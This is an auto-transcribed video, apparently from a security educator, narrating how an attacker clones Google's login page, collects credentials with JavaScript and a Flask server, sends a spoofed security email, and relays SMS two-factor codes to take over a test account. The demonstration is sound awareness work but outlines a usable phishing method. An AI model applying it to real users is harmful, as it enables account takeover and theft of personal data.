how do hackers bypass two-factor authentication how can you bypass two-factor on vacation well as a red team or a penetration tester ethical hacker or what have you sometimes you don't even necessarily bypass two-factor authentication but you work within the constraints and restrictions that it presents to you as a hacker in this video I'm going to show you one way that we might be able to do that obviously this video is for education's sake it's for learning it's for awareness it's just for information and hopefully we have a little bit of fun with it but hey
say hello to Lewis Miller this is our Target this is our victim he is the individual this is just a sock puppet account that I've created again just for learning here just for that sandbox sake we're gonna go ahead and distill or gloss over or water down some of the things we might end up doing here but Lewis Miller is our individual Target now I'm going to be hopping in and out in between back and forth the victim perspective and the attacker perspective because we only have one screen here on YouTube but I'll try to
add a little video overlay to show you where we are in the perspective here so say Lewis Miller was doing his thing hey he was taking a look at his email there's nothing in there at the moment but he is a Google Gmail user and our attacker has maybe done some profiling they've done some research they've done their homework and they've figured out hey what is Lewis's email address they figured out his profile picture because that's obviously online on the internet and the hacker knows that he has a Google account now the hacker threat actor
adversary wants to social engineer Lewis he wants to fool him he wants to deceive him he wants to trick him into accidentally giving his password and then everything that they might need for the two-factor authentication access so what that hacker might do is honestly just try to recreate the regular login page for Google for hey entering the email address Lewis l Miller 76 gmail.com and trying to make it look like everything that they would experience as they were naturally logging in say they enter their password yada yada yada and then once they click on that
button to log in it then prompts them them for the two-factor authentication code potentially sent to their phone SMS and that way they are able to retrieve that info just as well that's sort of like a watering hole attack let me show you how we might set that up because what's to stop me from just sort of right clicking on this page checking the inspect option and then grabbing just the bare bones basic stupid and dumb HTML and all of the hypertext markup language this whole page is made up of we could right click and
edit as HTML to get all of this data as something that we could just sort of copy and paste and then if I move into a text editor and then just paste and slap all this in here and now they could scroll through this look for any of the indicators of high Lewis and then see oh what changes might we make to change this to John or Alice or Joe or anything and then replace the profile picture images we know that's probably going to be in like a gif image or a JPEG file or probably
going to be hosted by Google's user content they can make that change super duper easy easily and of course manipulating hey what email is displayed here now once the hacker has customized the HTML to be tailored and targeted towards the victim they still aren't done because right now it's just a flat HTML page they probably want to add some other code at the very very end or hidden and tucked away some way somehow so they can actually collect the credentials that are typed in to the form I'll do this with just some super simple super
dumb easy JavaScript again client-side codes that we end up taking ooh the input that they fill in for their password let's post it to the web server so that we can keep track of that data now once those HTML files have been crafted manipulated modified to look like the victim all the hacker wants to do is serve those publicly on the open internet they want a web server they want something that they can still sort of catch and collect all the information that goes through that so I'm doing this in a super simple crude easy
rudimentary way just a stupid dumb python little server here done with flask to create routes for the login page for the the two-factor authentication page and do this thing now I'll show you this because if we were to go ahead and run this nice and easy I am just going to be listening on localhost hey local Port local Port 5000 whatever if you wanted to of course you could buy a domain to make the super duper realistic you could spin it out on the open internet with like I don't know ngrok make a scheme for
HTTP that matches this or obviously have a self-signed certificate try to look as realistic as possible but for demonstration's sake look we're doing it super easy next the hacker wants to create a phishing email they want to create some bait they want to make a lure something that will hook the user into thinking oh no there is a problem with my Google account and I need to check in and confirm my information review access and all those security things with a little bit of urgency so they're willing to do it right then and there because
the hacker needs to be waiting and awaiting to get their password send off a genuine real too fat from the location code and then retrieve it so that they can log in rather than them so again hey just for the sake of demons stations we're going to keep this super duper easy I'm gonna go ahead and send an email with Anonymous email hey if you wanted to subscribe do whatever you could change oh uh Google security team blah blah blah maybe you could change the email that it came from going to two of course we
do want to send this to our victim Louis l Miller 76 gmail.com and now we want to craft the phishing email obviously If This Were Real they would do it with a little bit more professionalism they'd make it super duper believable they'd make the images they'd make it look like a genuine real email from Google But ultimately we're gonna keep it kind of simple and easy let me go ahead and create a link let's say please click here to confirm your account and I will add a link to go to localhost on Port 5000 where
I'm serving that bait that lure that hook and now we could go ahead and send the email for demonstrations sake I'll go ahead and put these side by side and of course hey once I hit that send email button we should see that fire off and land in Louis's inbox there it is cool perfect now Lewis has this security alert hey we noticed some suspicious activity on your Google account please click here to confirm your account information so let's go ahead and click on that link as the poor innocent silly naive user that we are
and let's go ahead and enter our password remember I am real Lewis right now I am genuinely actually the victim and let's say I type in my password blah blah blah I don't use a password manager because I'm stupid and don't do those security things now bear in mind the actual hacker here wants to be sitting and waiting and just ready to catch once this user actually clicks on that lore and starts to type in the password they want to be able to try to genuinely legitimately log in as Lewis as the victim so that
a real two-factor on vacation code gets sent to their device let's do this side by side so you can see both the victim and the attacker at the same time say on the right hand side is the victim poor Lewis just typed in his password on the left hand side is the attacker waiting and ready to catch the password as they click the next button I'll fire it off here and there it is we can see we have exfiltrated and stolen Lewis's real password and now he's going to be waiting for a real genuine two-factor
authentication code sent to his cell phone I've got that ready right here and let's go be the poor victim Lewis but wait before we go any further for our social engineering and all the pen testy hacker stuff that we're up to I do want to give a little bit of love to today's sponsor Plex track because hey you might just be doing some of this awesome stuff in your latest pen test and you want to make it super duper easy to write the report take it away Plex track when you're performing a penetration test you're
in the zone you're hacking away and you're having fun Gathering findings beating up vulnerabilities and earning domain admin but you might be dreading the work that comes after you have to write a report but writing a pen test report doesn't have to be dull and boring and long and tedious in fact it can be a breeze you don't even have to worry about your report because Plex track can handle it for you if you aren't familiar Plex track is the Premier cyber security reporting and collaboration platform that makes penetration testers red teamers and cyber security
teams more efficient effective and proactive Plex track removes the pain of reporting and lets you collaborate between both red and blue teams for Effective purple teaming and faster remediation the Plex track platform lets you easily aggregate findings pull in reusable content from write-up databases and content libraries and track and measure engagement progress in real time import assets from CSV files or nmap or nessus and so many others of your favorite tools with over 25 Integrations you can streamline your reporting and collaboration process right into your existing workflow you can do even faster testing with Plex
tracks runbooks and show the impact to managers in leadership with Plex tracks analytics and visualizations within minutes you can have your pen test report done and dusted all with your team's logo and details and then sent off to the clients spend more time hacking and less time reporting learn how you can boost your team's efficiency by 30 percent and cut reporting Time by up to 65 with Plex Drive seriously check out Plex track I have great colleagues and peers that use Plex track every day for reporting get started with my link below in the video
description and let you and your team get back to hacking huge thanks to Plex track for sponsoring this video Back In Action here say that our hacker had successfully stolen XL trailer and gotten the password for the victim the target Lewis here now in a separate window a separate session someone that is not logged into a Google account just a guest here let's say that they were going to try and log in in real time literally trying to log in to Lewis's account hit next to log in enter the password that they have now discovered
and then send a real and genuine two-factor on the vacation to Lewis's phone so I'm gonna go ahead and click next here and we'll see genuinely real Google has sent a number to my phone and I have Lewis's phone right here for me and he's just gotten that text message so now I'm going to go ahead and click into this I'll see that the Google code is eight five five zero zero one and now let's go back to the victim perspective here say I'm Lewis and I enter in the code 855001 and over on the
left hand side the attacker is ready and waiting to retrieve this because once they hit next they're going to be redirected back to the original login prompt nothing's gonna happen for Lewis but the attacker has now received that two-factor authentication code and they can successfully log in in their login let me go ahead and finish this and now Lewis has been successfully logged in for this thread actor take a look we are in fact Lewis we can go manage our Google accounts and with that we have an account takeover we can do whatever we want
now we can hey go take a look at their contacts we can go see what they're up to on YouTube we can go into their Google drive file we can go into their Gmail we can honestly I don't know take out all of their personal private data locations that they've been to things that they've been up to we can honestly just do a quick Google takeout dig it into their personal information their birthday what cards what things they might have saved other passwords or addresses hooked up to their profile anything it is a full account
takeover compromise of their identity with their Google account connected to so much and listen hey this is all just for education's sake this is all just for the demo just for the Showmanship just for fun obviously yeah there could be some hiccups here Google has a much more secure like hey press the button on your phone with the Google connection or whatever it's not always going to be SMS based text messages for two facts on an occasion but that does go to show just how maybe potentially sometimes insecure two-factor authentication over SMS and text message
really is and at the end of the day if you have an attacker a hacker threat actor adversary that's just kind of willing to sit by their dial here waiting for the user to click on it on their fishing link to actually submit their password well that they can then kind of streamlined into the same thread parallel to the user send in that password have a genuine two-factor code sent to them and then retrieve that to really really log in as of them when the victim is nonetheless or trapped in a loop trying to log
in and they keep getting sent back anyway I hope this was fun I hope this was cool cool I hope this was a little eye-opening to see wow that actually happening in real time and seeing what could be done for stealing and tracking down those two-factor authentication codes and how hackers might still be able to compromise your account even if you have two factors indication turned on anyway thanks so much for watching hope you enjoyed like comment subscribe I'll see in the next video